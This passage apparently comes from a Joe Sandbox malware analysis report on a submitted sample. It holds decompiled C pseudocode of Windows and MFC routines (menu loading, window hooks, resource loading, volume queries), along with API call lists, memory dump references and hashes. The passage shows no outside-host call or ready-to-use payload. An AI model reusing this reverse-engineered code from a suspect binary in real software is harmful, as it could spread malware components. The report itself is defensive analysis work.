				_t55 =  *((intOrPtr*)( *__ecx + 0x84))();
				if( *((intOrPtr*)(_t76 + 8)) == 0) {
					_push(0xffffffff);
					_push(0);
					_t89 = _t55;
					if(_t55 == 0) {
						_push(0xf10c);
					} else {
						_push(0xf10b);
					}
					E00417146(0, _t72, _t76, _t79, _t89);
				}
				 *((intOrPtr*)(_t80 - 0x10)) = 0;
				_t90 =  *((intOrPtr*)(_t79 + 0x8c));
				if( *((intOrPtr*)(_t79 + 0x8c)) != 0) {
					goto L31;
				} else {
					_t69 = E00404461(_t90, 0x28);
					 *((intOrPtr*)(_t80 + 8)) = _t69;
					 *((intOrPtr*)(_t80 - 4)) = 1;
					goto L16;
				}
			}















                  0x00416609
                  0x00416609
                  0x00416610
                  0x00416615
                  0x00416617
                  0x0041661a
                  0x00416622
                  0x00416627
                  0x00416752
                  0x00416766
                  0x00416769
                  0x0041676b
                  0x0041676f
                  0x0041676f
                  0x00416774
                  0x00416777
                  0x00416777
                  0x0041677c
                  0x00416784
                  0x00416784
                  0x00416779
                  0x00416779
                  0x00000000
                  0x00416779
                  0x0041662d
                  0x0041662f
                  0x00416745
                  0x0041674e
                  0x00000000
                  0x0041674e
                  0x00416635
                  0x00000000
                  0x00000000
                  0x0041663e
                  0x004166ff
                  0x00416705
                  0x00416708
                  0x0041670e
                  0x00416710
                  0x00416712
                  0x00416715
                  0x0041671b
                  0x0041671d
                  0x0041671f
                  0x0041671f
                  0x00416732
                  0x00416738
                  0x00416738
                  0x00000000
                  0x00416710
                  0x00416647
                  0x004166f2
                  0x004166f8
                  0x00000000
                  0x004166f8
                  0x00416650
                  0x004166ab
                  0x004166b1
                  0x004166b4
                  0x004166ba
                  0x00000000
                  0x00000000
                  0x004166c8
                  0x004166ca
                  0x004166cd
                  0x004166d0
                  0x004166d0
                  0x004166d2
                  0x004166db
                  0x004166db
                  0x004166d4
                  0x004166d4
                  0x004166d4
                  0x004166dd
                  0x004166e3
                  0x00000000
                  0x004166e3
                  0x00416655
                  0x00000000
                  0x00000000
                  0x0041665f
                  0x00416668
                  0x0041666a
                  0x0041666c
                  0x0041666d
                  0x0041666f
                  0x00416678
                  0x00416671
                  0x00416671
                  0x00416671
                  0x0041667d
                  0x0041667d
                  0x00416682
                  0x00416685
                  0x0041668b
                  0x00000000
                  0x00416691
                  0x00416699
                  0x0041669b
                  0x0041669e
                  0x00000000
                  0x0041669e

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00416610
                  • SendMessageA.USER32(?,00000111,0000E108,00000000), ref: 00416732
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3MessageSend
                  • String ID:
                  • API String ID: 936991600-0
                  • Opcode ID: e4de2e1b29feed0a13db066fa8e5efa98775103b20291ef35618312c6e1f6ce6
                  • Instruction ID: 70473528937c0bf9d11c87dc8b8dc0f91426da9b43ce8fb73777ee02d115459c
                  • Opcode Fuzzy Hash: e4de2e1b29feed0a13db066fa8e5efa98775103b20291ef35618312c6e1f6ce6
                  • Instruction Fuzzy Hash: 4F414F74600611DFDB249F69C888AAAB7F0BB58308F11893FE156D7391DB78D8C18F59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004185A1, Relevance: 3.1, APIs: 2, Instructions: 109COMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E004185A1(void* __ebx, intOrPtr* __ecx, void* __edx, void* __eflags, signed int _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				struct tagRECT _v20;
				signed int _v24;
				signed int _v36;
				char _v68;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				void* _t56;
				void* _t78;
				void* _t81;
				intOrPtr* _t85;

				_t90 = __eflags;
				_t78 = __edx;
				_t56 = __ebx;
				_push(_t81);
				_t85 = __ecx;
				 *((intOrPtr*)(__ecx + 0x8c)) = _a28;
				E00411F96(__ebx, __ecx, _t81, __ecx, __eflags, 0x10);
				E00411F96(__ebx, __ecx, _t81, __ecx, _t90, 0x3c000);
				E00431160(0,  &_v68, 0, 0x30);
				if(_a12 == 0) {
					_a12 = 0x50800000;
				}
				_v36 = _a12;
				_push( &_v68);
				if( *((intOrPtr*)( *_t85 + 0x64))() != 0) {
					_t37 = E00417E26(_t85, _t78, __eflags,  *((intOrPtr*)(_t85 + 0x88)), _a20); // executed
					__eflags = _t37;
					if(_t37 == 0) {
						goto L3;
					} else {
						 *((intOrPtr*)(_t85 + 0x8c)) = 0;
						E00412B6C(_t85, 0xc00000, _v36 & 0x00c00000, 0);
						E00412B98(_t85, 0x200, _v24 & 0x00000200, 0);
						E00412C0B(_t85, _a24);
						GetWindowRect( *(_t85 + 0x20),  &_v20);
						E00419E93(_t56, _t85, 0, _t85, __eflags, 1, _v20.right - _v20.left, _v20.bottom - _v20.top, 0x4527fc, 0x4527fc);
						_t49 = E004122AD(_t85,  *((intOrPtr*)(_t85 + 0x88)));
						__eflags = _t49;
						if(_t49 == 0) {
							goto L3;
						} else {
							_t50 = _a16;
							_push(_t56);
							E00412D05(_t85, 0,  *_a16,  *((intOrPtr*)(_t50 + 4)),  *((intOrPtr*)(_t50 + 8)) -  *_a16,  *((intOrPtr*)(_t50 + 0xc)) -  *((intOrPtr*)(_t50 + 4)), 0x14); // executed
							__eflags = _a12 & 0x10000000;
							if((_a12 & 0x10000000) != 0) {
								E00412C34(_t85, 1); // executed
							}
							_t38 = 1;
							__eflags = 1;
						}
					}
				} else {
					L3:
					_t38 = 0;
				}
				return _t38;
			}

















                  0x004185a1
                  0x004185a1
                  0x004185a1
                  0x004185ad
                  0x004185ae
                  0x004185b2
                  0x004185b8
                  0x004185c2
                  0x004185d0
                  0x004185db
                  0x004185dd
                  0x004185dd
                  0x004185ea
                  0x004185ef
                  0x004185f7
                  0x0041860b
                  0x00418610
                  0x00418612
                  0x00000000
                  0x00418614
                  0x00418623
                  0x00418629
                  0x0041863d
                  0x00418647
                  0x00418653
                  0x00418672
                  0x0041867f
                  0x00418684
                  0x00418686
                  0x00000000
                  0x0041868c
                  0x0041868c
                  0x00418694
                  0x004186a8
                  0x004186ad
                  0x004186b5
                  0x004186bb
                  0x004186bb
                  0x004186c2
                  0x004186c2
                  0x004186c2
                  0x00418686
                  0x004185f9
                  0x004185f9
                  0x004185f9
                  0x004185f9
                  0x004186c6

                  APIs
                    • Part of subcall function 00411F96: _memset.LIBCMT ref: 00411FC6
                  • _memset.LIBCMT ref: 004185D0
                    • Part of subcall function 00417E26: FindResourceA.KERNEL32(?,?,00000005), ref: 00417E42
                    • Part of subcall function 00417E26: LoadResource.KERNEL32(?,00000000), ref: 00417E4A
                    • Part of subcall function 00417E26: LockResource.KERNEL32(00000000), ref: 00417E57
                    • Part of subcall function 00417E26: FreeResource.KERNEL32(00000000,00000000,?,?), ref: 00417E6F
                  • GetWindowRect.USER32 ref: 00418653
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Resource$_memset$FindFreeLoadLockRectWindow
                  • String ID:
                  • API String ID: 2572468386-0
                  • Opcode ID: 2c2feab1a74483de2365b3fae192b7c3f521a05bb95ecf08c35458e0af3a68d2
                  • Instruction ID: cc6bf4f3222145c678c235a5d4e7989ebcd45410e0d0120669b6de292d8644ed
                  • Opcode Fuzzy Hash: 2c2feab1a74483de2365b3fae192b7c3f521a05bb95ecf08c35458e0af3a68d2
                  • Instruction Fuzzy Hash: EE313971600209AFEB14EF69CD55FBF77A9EB88704F00411EF906D3291DBB8AD518A68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040ACDF, Relevance: 3.1, APIs: 2, Instructions: 80windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E0040ACDF(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t29;
				void* _t31;
				struct HMENU__* _t36;
				signed short _t63;
				intOrPtr* _t66;
				void* _t67;
				void* _t68;

				_t61 = __edx;
				_t46 = __ebx;
				_push(4);
				E00431A9B(E0044AE45, __ebx, __edi, __esi);
				_t66 = __ecx;
				_t63 =  *(_t68 + 8);
				 *(__ecx + 0xa4) = _t63;
				E004014C0(_t68 + 8, __edx);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t52 = _t68 + 8;
				_t29 = E00402720(_t68 + 8, _t63);
				_t70 = _t29;
				if(_t29 != 0) {
					E0041B29E(_t66 + 0xc4,  *(_t68 + 8), 0, 0xa);
				}
				E00411F96(_t46, _t52, _t63, _t66, _t70, 8);
				_t31 = E00408C1D(_t46, _t66, _t70,  *((intOrPtr*)(_t68 + 0xc)), _t63);
				E00405562(_t68 - 0x10, _t70, _t66 + 0xc4);
				_push( *((intOrPtr*)(_t68 + 0x14)));
				_push(0);
				_t64 = _t63 & 0x0000ffff;
				_push(_t63 & 0x0000ffff);
				_push( *((intOrPtr*)(_t68 + 0x10)));
				_push(0x46279c);
				_push( *((intOrPtr*)(_t68 + 0xc)));
				 *(_t68 - 4) = 1;
				_push( *((intOrPtr*)(_t68 - 0x10)));
				_push(_t31); // executed
				if( *((intOrPtr*)( *_t66 + 0x13c))() != 0) {
					__eflags =  *((intOrPtr*)(_t66 + 0xd4)) - 1;
					if(__eflags != 0) {
						_t36 =  *(_t66 + 0xd8);
					} else {
						_t36 = GetMenu( *(_t66 + 0x20));
					}
					_t56 = _t66;
					 *(_t66 + 0x5c) = _t36;
					E00408862(_t66, __eflags, _t64);
					__eflags =  *((intOrPtr*)(_t68 + 0x14));
					if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
						E0040F918(1, _t56,  *(_t66 + 0x20), 0x364, 0, 0, 1, 1); // executed
					}
					_t67 = 1;
					goto L4;
				} else {
					_t67 = 0;
					L4:
					E004010B0( *((intOrPtr*)(_t68 - 0x10)) + 0xfffffff0, _t61);
					E004010B0( *(_t68 + 8) + 0xfffffff0, _t61);
					return E00431B73(_t67);
				}
			}










                  0x0040acdf
                  0x0040acdf
                  0x0040acdf
                  0x0040ace6
                  0x0040aceb
                  0x0040aced
                  0x0040acf3
                  0x0040acf9
                  0x0040acfe
                  0x0040ad03
                  0x0040ad06
                  0x0040ad0b
                  0x0040ad0d
                  0x0040ad1d
                  0x0040ad1d
                  0x0040ad24
                  0x0040ad2f
                  0x0040ad40
                  0x0040ad45
                  0x0040ad4a
                  0x0040ad4c
                  0x0040ad4f
                  0x0040ad50
                  0x0040ad55
                  0x0040ad5a
                  0x0040ad5d
                  0x0040ad61
                  0x0040ad64
                  0x0040ad6d
                  0x0040ad94
                  0x0040ad9a
                  0x0040ada7
                  0x0040ad9c
                  0x0040ad9f
                  0x0040ad9f
                  0x0040adae
                  0x0040adb0
                  0x0040adb3
                  0x0040adba
                  0x0040adbd
                  0x0040adcb
                  0x0040adcb
                  0x0040add0
                  0x00000000
                  0x0040ad6f
                  0x0040ad6f
                  0x0040ad71
                  0x0040ad77
                  0x0040ad82
                  0x0040ad8e
                  0x0040ad8e

                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3Menu
                  • String ID:
                  • API String ID: 3706238695-0
                  • Opcode ID: 4980b77b380ecdf8f607853d1d864b43a4b1bd649bfc2099a66247c299cd0400
                  • Instruction ID: eeb843b551fa435bf3fec831ef0401d74a3c4f4e1e69e6eff3f7a39c04ab7661
                  • Opcode Fuzzy Hash: 4980b77b380ecdf8f607853d1d864b43a4b1bd649bfc2099a66247c299cd0400
                  • Instruction Fuzzy Hash: EE21A071600304AFDB20AF71CC41FAF77B9AF44309F00452EBA56672E1DB789950DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040AF79, Relevance: 3.1, APIs: 2, Instructions: 70windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E0040AF79(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20, CHAR* _a24, intOrPtr _a28, intOrPtr _a32) {
				struct HMENU__* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				struct HMENU__* _t39;
				void* _t42;
				intOrPtr _t48;
				intOrPtr _t51;
				intOrPtr* _t57;

				_t42 = __ebx;
				_push(__ecx);
				_t57 = __ecx;
				_v8 = 0;
				_t59 = _a24;
				if(_a24 == 0) {
					L4:
					E00402CA0(_t57 + 0xc4, _t57, _a8);
					_t28 = _a20;
					__eflags = _t28;
					if(_t28 != 0) {
						_a24 =  *((intOrPtr*)(_t28 + 0x20));
					} else {
						_a24 = 0;
					}
					_t30 = _a16;
					_t48 =  *((intOrPtr*)(_t30 + 4));
					_t51 =  *_t30;
					_t33 =  *((intOrPtr*)( *_t57 + 0x5c))(_a28, _a4, _a8, _a12, _t51, _t48,  *((intOrPtr*)(_t30 + 8)) - _t51,  *((intOrPtr*)(_t30 + 0xc)) - _t48, _a24, _v8, _a32, _t42);
					__eflags = _t33;
					if(_t33 != 0) {
						_t35 = 1;
						__eflags = 1;
						goto L11;
					} else {
						__eflags = _v8 - _t33;
						if(_v8 != _t33) {
							DestroyMenu(_v8);
						}
						L3:
						_t35 = 0;
						L11:
						return _t35;
					}
				}
				_t39 = LoadMenuA( *(E0041F363(__ebx, 0, __ecx, _t59) + 0xc), _a24);
				_v8 = _t39;
				if(_t39 != 0) {
					goto L4;
				}
				 *((intOrPtr*)( *_t57 + 0x11c))();
				goto L3;
			}
















                  0x0040af79
                  0x0040af7e
                  0x0040af83
                  0x0040af85
                  0x0040af88
                  0x0040af8b
                  0x0040afb4
                  0x0040afbd
                  0x0040afc2
                  0x0040afc5
                  0x0040afc7
                  0x0040afd1
                  0x0040afc9
                  0x0040afc9
                  0x0040afc9
                  0x0040afd4
                  0x0040afd7
                  0x0040afda
                  0x0040b004
                  0x0040b008
                  0x0040b00a
                  0x0040b01e
                  0x0040b01e
                  0x00000000
                  0x0040b00c
                  0x0040b00c
                  0x0040b00f
                  0x0040b014
                  0x0040b014
                  0x0040afb0
                  0x0040afb0
                  0x0040b01f
                  0x0040b022
                  0x0040b022
                  0x0040b00a
                  0x0040af99
                  0x0040af9f
                  0x0040afa4
                  0x00000000
                  0x00000000
                  0x0040afaa
                  0x00000000

                  APIs
                  • LoadMenuA.USER32 ref: 0040AF99
                  • DestroyMenu.USER32(?,?,?,?,?,?,?,?,?), ref: 0040B014
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$DestroyLoad
                  • String ID:
                  • API String ID: 588275208-0
                  • Opcode ID: 011dedb1d4b93fb0fec950f638cbb21010f1c2d5a66f29dead3501da4ea3d920
                  • Instruction ID: 118bc1eea92f049343cb41fc0e01d682e6849735effaaea45bedc3916b800edf
                  • Opcode Fuzzy Hash: 011dedb1d4b93fb0fec950f638cbb21010f1c2d5a66f29dead3501da4ea3d920
                  • Instruction Fuzzy Hash: F52168B521020AEFCF11CF65C9488AABBB5FF88354B108466F815A7261D738DD21DF65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00426D44, Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00426D44(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				void* _t40;
				void* _t52;
				signed int _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;

				_t59 = __eflags;
				_t52 = __edx;
				_t44 = __ebx;
				_push(0x10);
				E00431A9B(E0044C2F5, __ebx, __edi, __esi);
				_t56 = __ecx;
				 *(_t57 - 0x14) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) - 0xc)) + 0xa;
				 *(_t57 - 0x10) = E00404461(_t59,  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x10)) - 0xc)) + 0xa);
				_t32 = E0041F363(__ebx, __edi, _t56, _t59);
				_t54 = 0;
				 *((intOrPtr*)(_t57 - 0x18)) =  *((intOrPtr*)(_t32 + 4));
				if( *((intOrPtr*)(_t56 + 4)) > 0) {
					do {
						_t9 = _t54 + 1; // 0x1
						_t44 = _t9;
						swprintf( *(_t57 - 0x10),  *(_t57 - 0x14),  *(_t56 + 0x10), _t44);
						_t58 = _t58 + 0x10;
						_t40 = E00426700( *((intOrPtr*)(_t57 - 0x18)), _t57 - 0x1c,  *((intOrPtr*)(_t56 + 0xc)),  *(_t57 - 0x10), 0x44f0f5); // executed
						 *(_t57 - 4) =  *(_t57 - 4) & 0x00000000;
						E004057D4( *((intOrPtr*)(_t56 + 8)) + _t54 * 4, _t40);
						 *(_t57 - 4) =  *(_t57 - 4) | 0xffffffff;
						E004010B0( *((intOrPtr*)(_t57 - 0x1c)) + 0xfffffff0, _t52);
						_t54 = _t44;
						_t61 = _t54 -  *((intOrPtr*)(_t56 + 4));
					} while (_t54 <  *((intOrPtr*)(_t56 + 4)));
				}
				return E00431B73(E00404490(_t44, _t54, _t56, _t61,  *(_t57 - 0x10)));
			}











                  0x00426d44
                  0x00426d44
                  0x00426d44
                  0x00426d44
                  0x00426d4b
                  0x00426d50
                  0x00426d5c
                  0x00426d65
                  0x00426d68
                  0x00426d70
                  0x00426d75
                  0x00426d78
                  0x00426d7a
                  0x00426d7d
                  0x00426d7d
                  0x00426d88
                  0x00426d93
                  0x00426da3
                  0x00426da8
                  0x00426db3
                  0x00426dbb
                  0x00426dc2
                  0x00426dc7
                  0x00426dc9
                  0x00426dc9
                  0x00426d7a
                  0x00426ddc

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00426D4B
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • swprintf.LIBCMT ref: 00426D88
                    • Part of subcall function 00431BA5: __vsprintf_s_l.LIBCMT ref: 00431BB9
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3__vsprintf_s_l_mallocswprintf
                  • String ID:
                  • API String ID: 367293577-0
                  • Opcode ID: 3a214aab7a86e2a5f63ff26eeba659317651d5fcca418b5b44d70a51458bef8e
                  • Instruction ID: 9573cca5b79f8fc0a76bfd734ff5aaffca9d9069506fe4030a5ee5cff69ba3c8
                  • Opcode Fuzzy Hash: 3a214aab7a86e2a5f63ff26eeba659317651d5fcca418b5b44d70a51458bef8e
                  • Instruction Fuzzy Hash: B711A371D0060A9FCB10EFA5C882E6FB3F5FF44318F10492EF121A72A1CB38A9408B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004292E7, Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                  Download Yara Rule
                  C-Code - Quality: 75%
                  			E004292E7(intOrPtr __ebx, intOrPtr __edx, struct HINSTANCE__* _a4, intOrPtr _a8) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t8;
				long _t14;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t29;
				intOrPtr _t32;
				signed int _t36;

				_t26 = __edx;
				_t19 = __ebx;
				_t34 = _t36;
				_t8 =  *0x463404; // 0x18eab29f
				_v8 = _t8 ^ _t36;
				_t28 = _a8;
				GetModuleFileNameA(_a4,  &_v268, 0x104);
				_t14 = GetShortPathNameA( &_v268, E004014F0(_a8, 0x104), 0x104); // executed
				if(_t14 == 0) {
					E00402830(_t26, _t28,  &_v268);
				}
				_t15 = E0040A356(_t28, 0xffffffff);
				_pop(_t29);
				_pop(_t32);
				return E00430650(_t15, _t19, _v8 ^ _t34, _t26, _t29, _t32);
			}















                  0x004292e7
                  0x004292e7
                  0x004292ea
                  0x004292f2
                  0x004292f9
                  0x00429301
                  0x00429312
                  0x00429329
                  0x00429331
                  0x0042933c
                  0x0042933c
                  0x00429345
                  0x0042934d
                  0x00429350
                  0x00429357

                  APIs
                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00429312
                  • GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00429329
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Name$FileModulePathShort
                  • String ID:
                  • API String ID: 4073693819-0
                  • Opcode ID: 905a4995cd81f9c0174dea4ed714b7411b98bcdaeadfe175916a8af081c008a5
                  • Instruction ID: 8e1aa580d8501399bd92b9dd3bfa18adfe58bb0007ac89ee96572330ca29169d
                  • Opcode Fuzzy Hash: 905a4995cd81f9c0174dea4ed714b7411b98bcdaeadfe175916a8af081c008a5
                  • Instruction Fuzzy Hash: FCF0A4766000146BCB10EFAADC45DEFB7ADEF99324F04416AF845E32C1DF78AA418B59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023EA88E, Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                  Download Yara Rule
                  APIs
                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 023EA8A3
                  • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,023F0D98,00000000,00000000,00000000,00000000), ref: 023EA8E6
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: DirectoryInformationVolumeWindows
                  • String ID:
                  • API String ID: 3487004747-0
                  • Opcode ID: 8655554531e0ec3226f801076e3529c545d3ae9ca9f9c8edba7825877c693133
                  • Instruction ID: 947347421add9d8fbdcf6b6765822ca6342fddc9748acf0ad9a49ac75f9e9d35
                  • Opcode Fuzzy Hash: 8655554531e0ec3226f801076e3529c545d3ae9ca9f9c8edba7825877c693133
                  • Instruction Fuzzy Hash: E8F089A5D403149AEF649764DC09EB777BCDF80700F04C19AF56A83091FB70998587E1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00410F0D, Relevance: 3.0, APIs: 2, Instructions: 32threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00410F0D(void* __eflags, intOrPtr _a4) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HHOOK__* _t6;
				void* _t8;
				void* _t10;
				intOrPtr _t11;
				void* _t12;
				struct HHOOK__* _t13;

				_t6 = E00420AEC(_t8, 0x466508, _t10, _t12, __eflags, 0x406452);
				_t13 = _t6;
				_t15 = _t13;
				if(_t13 == 0) {
					_t6 = E00406436(_t8, 0x466508, _t10, _t13, _t15);
				}
				_t11 = _a4;
				if( *((intOrPtr*)(_t13 + 0x14)) == _t11) {
					return _t6;
				} else {
					if( *(_t13 + 0x28) == 0) {
						_t6 = SetWindowsHookExA(5, E00410CBA, 0, GetCurrentThreadId()); // executed
						 *(_t13 + 0x28) = _t6;
						_t18 = _t6;
						if(_t6 == 0) {
							_t6 = E004063FE(_t8, 0x466508, _t11, _t13, _t18);
						}
					}
					 *((intOrPtr*)(_t13 + 0x14)) = _t11;
					return _t6;
				}
			}












                  0x00410f1e
                  0x00410f23
                  0x00410f25
                  0x00410f27
                  0x00410f29
                  0x00410f29
                  0x00410f2e
                  0x00410f34
                  0x00410f64
                  0x00410f36
                  0x00410f3a
                  0x00410f4c
                  0x00410f52
                  0x00410f55
                  0x00410f57
                  0x00410f59
                  0x00410f59
                  0x00410f57
                  0x00410f5e
                  0x00000000
                  0x00410f5e

                  APIs
                    • Part of subcall function 00420AEC: __EH_prolog3.LIBCMT ref: 00420AF3
                  • GetCurrentThreadId.KERNEL32 ref: 00410F3C
                  • SetWindowsHookExA.USER32 ref: 00410F4C
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3$CurrentException@8HookThreadThrowWindows
                  • String ID:
                  • API String ID: 1415497866-0
                  • Opcode ID: 37f3d0fc7647bf2c85f398416bb1e7c84d4a3ea5ec68988cbb3fd77fc1d52bf8
                  • Instruction ID: 6c588268bc8433113d32a2b5924d2362cc050002e169fed3ae89e1c569c52b8e
                  • Opcode Fuzzy Hash: 37f3d0fc7647bf2c85f398416bb1e7c84d4a3ea5ec68988cbb3fd77fc1d52bf8
                  • Instruction Fuzzy Hash: 9CF0273260071077C7302F67A806B577798EBC0B61F11013FFA0656280D6F8D8C1C6AE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040CCC8, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040CCC8(intOrPtr* __ecx, int _a4, int _a8, long _a12) {
				_Unknown_base(*)()* _t11;
				long _t12;
				intOrPtr* _t17;

				_t17 = __ecx;
				_t11 =  *(__ecx + 0x40);
				if(_t11 != 0) {
					L3:
					_t12 = CallWindowProcA(_t11,  *(_t17 + 0x20), _a4, _a8, _a12); // executed
					return _t12;
				}
				_t11 =  *( *((intOrPtr*)( *__ecx + 0xf8))());
				if(_t11 != 0) {
					goto L3;
				}
				return DefWindowProcA( *(__ecx + 0x20), _a4, _a8, _a12);
			}






                  0x0040ccce
                  0x0040ccd0
                  0x0040ccd5
                  0x0040ccf9
                  0x0040cd06
                  0x00000000
                  0x0040cd06
                  0x0040ccdf
                  0x0040cce3
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • DefWindowProcA.USER32(?,?,?,?), ref: 0040CCF1
                  • CallWindowProcA.USER32 ref: 0040CD06
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
